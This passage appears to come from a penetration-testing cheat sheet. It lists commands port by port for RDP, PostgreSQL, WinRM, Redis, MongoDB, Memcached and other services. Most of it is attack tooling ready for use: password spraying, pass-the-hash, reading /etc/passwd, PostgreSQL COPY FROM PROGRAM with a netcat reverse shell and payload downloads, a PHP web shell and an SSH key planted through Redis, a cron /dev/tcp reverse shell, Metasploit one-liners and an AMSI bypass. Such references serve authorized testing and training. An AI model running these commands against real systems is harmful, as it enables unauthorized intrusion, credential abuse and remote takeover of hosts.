| Action |
Command |
| Check login (password spray) |
nxc rdp <target_or_cidr> -u <user_or_list> -p '<pass_or_list>' |
| Domain auth |
nxc rdp <ip> -d <domain> -u <user> -p '<pass>' |
| Pass-the-hash |
nxc rdp <ip> -u <user> -H <NTHASH> |
| Kerberos (ccache) |
nxc rdp <fqdn> -k |
| Non-default port |
nxc rdp <ip> --port <port> -u <user> -p '<pass>' |
| Show NLA status in host banner |
nxc rdp <target> -u <user> -p '<password>' |
| Prove NLA disabled (unauth screenshot of login UI) |
nxc rdp <target> --nla-screenshot |
| Capture desktop after auth (evidence) |
nxc rdp <target> -u <user> -p '<password>' --screenshot --screentime 10 |
| Sweep a range for NLA-off hosts (save screenshots) |
nxc rdp <cidr> --nla-screenshot --res 1280x720 |
xfreerdp
- rdp client
- preferred over rdesktop.
| Action |
Command |
| Connect |
xfreerdp /v:<ip>:3389 /u:<user> /p:'<pass>' /cert:ignore |
| Domain auth |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /d:<domain> /cert:ignore |
| Fullscreen |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /f |
| Dynamic resolution |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /dynamic-resolution |
| Map local folder |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /drive:loot,<local_path> |
| Enable clipboard |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' +clipboard |
| Force TLS (no NLA) |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /sec:tls /cert:ignore |
| Force Standard RDP (legacy) |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /sec:rdp |
rdesktop
| Action |
Command |
| Connect |
rdesktop -u <user> -p '<pass>' <ip> |
| Domain auth |
rdesktop -u <user> -p '<pass>' -d <domain> <ip> |
| Fullscreen |
rdesktop -f -u <user> -p '<pass>' <ip> |
| Set resolution |
rdesktop -g 1920x1080 -u <user> -p '<pass>' <ip> |
| Map local folder |
rdesktop -r disk:loot=<local_path> -u <user> -p '<pass>' <ip> |
3690 TCP - SVN
svn
| Action |
Command |
| List repository contents |
svn list svn://<ip> |
| Checkout working copy |
svn checkout svn://<ip> |
| Show commit history |
svn log |
| Update to a specific revision |
svn update -r <revision> |
5432 TCP - Postgresql
Commands
| Action |
Command |
| Connect to database |
psql -h <ip> -U <user> -d <db>
psql postgresql://<username>:<password>@<host> |
| List databases |
\list |
| Use/switch database |
\c <db> |
| List tables |
\d |
| Get user roles (verbose) |
\du+ |
| Check if current user is superuser |
SELECT rolsuper FROM pg_roles WHERE rolname = current_user; |
| Browse server directory |
SELECT pg_ls_dir('./'); |
| List /etc directory |
SELECT pg_ls_dir('/etc'); |
| Read server file contents |
SELECT pg_read_file('/etc/passwd', 0, 100000); |
| Copy file contents into table |
CREATE TABLE <table>(content text); COPY <table> FROM '/path/to/file'; SELECT * FROM <table>; |
| Copy file into TEMP table (alt) |
CREATE TEMP TABLE <table>(content text); COPY <table> FROM $$C:\\path\\file.txt$$; SELECT content FROM <table>; DROP TABLE <table>; |
| Dump table to server file |
COPY <table> TO '/path/to/file.txt'; |
| Write literal text to file |
COPY (SELECT $$<text>$$) TO '/path/to/file.txt'; |
| Base64 decode → file (bytes) |
COPY (SELECT decode($$dGVzdGluZzEyMw==$$, $$base64$$)) TO $$C:\\test.bin$$; |
| Base64 decode → UTF-8 text file |
COPY (SELECT convert_from(decode($$dGVzdGluZzEyMw==$$, $$base64$$), $$utf-8$$)) TO $$C:\\test.txt$$; |
Attack Paths
Code Execution — C UDF/DLL
- Load a native library and expose an exported C symbol as a SQL function, then call it.
- Prereqs: Superuser (or equivalent), server account can read the library file, correct bitness (x64 vs x86).
- Paths: Absolute paths work; otherwise the file must be in
dynamic_library_path.
RCE — COPY ... PROGRAM (built-in, privilege-gated)
- Built-in PostgreSQL feature, not an exploit. If you have superuser (or role
pg_execute_server_program), the server can run OS commands and pipe stdout into a table.
- Minimal footprint: use a TEMP table so artifacts drop at session end.
| Action |
Command |
| Verify privilege |
SELECT current_user, rolsuper FROM pg_roles WHERE rolname = current_user; |
| Create temp results table |
CREATE TEMP TABLE cmd_exec(cmd_output text) ON COMMIT DROP; |
| PoC (Linux) |
COPY cmd_exec FROM PROGRAM 'whoami'; |
| PoC (Windows) |
COPY cmd_exec FROM PROGRAM 'cmd.exe /c whoami'; |
| Read output |
SELECT * FROM cmd_exec; |
| Reverse shell (Linux, if nc present) |
COPY cmd_exec FROM PROGRAM 'nc -n <ip> <port> -e /bin/bash'; |
| Download file (Linux) |
COPY cmd_exec FROM PROGRAM 'curl -s -o /tmp/payload http://<ip>/payload'; |
| Download file (Windows) |
COPY cmd_exec FROM PROGRAM "powershell -NoP -W Hidden -C \"iwr http://<ip>/payload -OutFile C:\\Windows\\Temp\\payload.exe\"" |
Commands run on the DB host as the PostgreSQL service account; no interactive prompts.
- Managed/cloud PostgreSQL often disables PROGRAM. Use absolute paths if PATH is constrained.
5985 TCP – WinRM
- Windows Remote Management (WS-Management over HTTP). Enables remote command execution and PowerShell remoting. Default auth is Negotiate (Kerberos/NTLM) with message-level encryption; Basic over HTTP indicates weak configuration. Prefer 5986/HTTPS in production.
curl
| Action |
Command |
| Fingerprint endpoint (401 expected) |
curl -sI http://<ip>:5985/wsman |
| Check auth methods |
curl -sI http://<ip>:5985/wsman | grep -i 'www-authenticate' |
nmap
| Action |
Command |
| Nmap WinRM probe |
nmap -p 5985 --script http-windows-remote-management <ip> |
nxc
| Action |
Command |
| Validate creds / spray |
nxc winrm <target_or_cidr> -u <user_or_list> -p '<pass_or_list>' |
| Domain auth |
nxc winrm <ip> -d <domain> -u <user> -p '<pass>' |
| Kerberos (ccache) |
nxc winrm <fqdn> -k |
| Pass-the-hash |
nxc winrm <ip> -u <user> -H <NTHASH> |
| Run CMD |
nxc winrm <ip> -u <user> -p '<pass>' -x "whoami /all" |
| Run PowerShell |
nxc winrm <ip> -u <user> -p '<pass>' -X "Get-LocalUser" |
evil-winrm (interactive)
| Action |
Command |
| Shell (HTTP) |
evil-winrm -i <ip> -u <user> -p '<pass>' |
| Shell (HTTPS 5986) |
evil-winrm -S -i <ip> -P 5986 -u <user> -p '<pass>' |
| Shell with client cert (HTTPS) |
evil-winrm -S -i <ip> -P 5986 -u <user> -p '<pass>' -k <private_key> -c <certificate> |
| Show menu (in-session) |
menu |
| AMSI bypass (in-session) |
Bypass-4MSI |
| Run local EXE in-memory (in-session) |
Invoke-Binary <path_to_local_exe> |
| Upload file (in-session) |
upload <local_path> <remote_path> |
| Download file (in-session) |
download <remote_path> <local_path> |
Notes
- Basic over HTTP works only if the host is configured with
Basic=true and AllowUnencrypted=true; if so, flag as a high-risk misconfiguration. Prefer 5986/TLS.
- WinRM typically restricted to local Administrators; successful auth is strong lateral-movement evidence.
5986 TCP – WinRM (HTTPS)
- WinRM over TLS; same API as 5985 with transport encryption. Common issues: self-signed/expired certs, CN/SAN mismatch, Basic enabled.
See 5985 TCP – WinRM
6379 TCP – Redis
- Key store / value storage.
Attack Paths
Arbitrary File Write (CONFIG + SAVE) → Web shell / SSH key / Cron
- Primitive:
CONFIG SET dir <target_dir> → CONFIG SET dbfilename <file> → SET … → SAVE.
Web shell (PHP)
| Action |
Command |
| Set target directory |
redis-cli -h <ip> CONFIG SET dir <web_root> |
| Set output filename |
redis-cli -h <ip> CONFIG SET dbfilename shell.php |
| Write PHP payload to key |
redis-cli -h <ip> SET test "<?php system($_REQUEST['cmd']); ?>" |
| Persist to disk |
redis-cli -h <ip> SAVE |
SSH authorized_keys
| Action |
Command |
| Stage public key locally |
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt |
| Upload staged key into Redis |
cat foo.txt | redis-cli -h <ip> -x SET crackit |
| Set target directory |
redis-cli -h <ip> CONFIG SET dir <writable_home_dir> |
| Set output filename |
redis-cli -h <ip> CONFIG SET dbfilename authorized_keys |
| Persist to disk |
redis-cli -h <ip> SAVE |
Cron reverse shell
| Action |
Command |
| Clear DB (optional) |
redis-cli -h <ip> FLUSHALL |
| Stage crontab entry key |
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1\n\n" | redis-cli -h <ip> -x SET 1 |
| Set target directory |
redis-cli -h <ip> CONFIG SET dir /var/spool/cron/ |
| Set output filename |
redis-cli -h <ip> CONFIG SET dbfilename root |
| Persist to disk |
redis-cli -h <ip> SAVE |
Module-Based RCE
| Action |
Command |
| Load module |
redis-cli -h <ip> MODULE LOAD <path_to_module> |
| Execute command |
redis-cli -h <ip> sys.exec "whoami" |
| Reverse shell |
redis-cli -h <ip> sys.rev <ip> <port> |
Rogue Replication → Module-Based RCE (Automated)
| Action |
Command |
| Metasploit (unauth) |
msfconsole -q -x "use exploit/linux/redis/redis_unauth_exec; set RHOSTS <ip>; set RPORT 6379; run; exit" |
| Metasploit (auth) |
msfconsole -q -x "use exploit/linux/redis/redis_replication_cmd_exec; set RHOSTS <ip>; set RPORT 6379; set PASSWORD <password>; run; exit" |
| Build module (redis-rogue-getshell) |
cd RedisModulesSDK && make |
| Rogue master → exec cmd |
python3 redis-master.py -r <ip> -p 6379 -L <lhost> -P <lport> -f RedisModulesSDK/exp.so -c "id" |
redis-cli
| Action |
Command |
| Get Redis info / test if authentication is required |
INFO |
| Login with credentials |
AUTH <password>
AUTH <username> <password> |
| Get configuration file contents |
CONFIG GET * |
| Show connected clients |
CLIENT LIST |
| Show keys |
KEYS * |
| Get keys from database |
SELECT <db_number_from_#Keyspace_in_INFO>
KEYS *
GET <key> |
nmap (NSE)
| Action |
Command |
| Enumerate server info |
nmap -p 6379 --script redis-info <ip> |
| Brute-force AUTH |
nmap -p 6379 --script redis-brute <ip> |
6667 TCP – IRC
- Internet Relay Chat (plaintext).
hexchat
nmap
| Action |
Command |
| Enumerate server/version |
nmap -sV -p 6667 --script irc-info <ip> |
nc
| Action |
Command |
| Connect (plaintext) |
nc -v <ip> 6667 |
6697 TCP – IRC (HTTPS/TLS)
- IRC over TLS/SSL (encrypted).
hexchat
- GUI IRC client; enable SSL/TLS for the server entry.
openssl
| Action |
Command |
| TLS connect (test cert/handshake) |
openssl s_client -connect <ip>:6697 -servername <host> |
nmap
| Action |
Command |
| Enumerate server/version |
nmap -sV -p 6697 --script irc-info <ip> |
27017 TCP – MongoDB
Commands
| Action |
Command |
| Connect to DB |
mongo -u <username> -p <password> <database> |
| Show collections |
show collections |
| Search for objects in a collection |
db.<collection>.find() |
| Add object to collection |
db.tasks.insert({"cmd":"<bash command>"}) |
11211 TCP – Memcached
- Caches information for database-backed websites to speed up performance.
nc
| Action |
Command |
| Connect |
nc -v <ip> 11211 |
telnet
| Action |
Command |
| Connect |
telnet <ip> 11211 |
Commands
| Action |
Command |
| Get version |
version |
| Get status |
stats |
| Get slabs |
stats slabs |
| Retrieve items list / slab items info |
stats items |
| Dump cached items from a slab (0 = unlimited lines) |
stats cachedump <slab_id> 0 |
Tip: stats items shows lines like STAT items:<#>:age ...; use that <#> as <slab_id> in stats cachedump.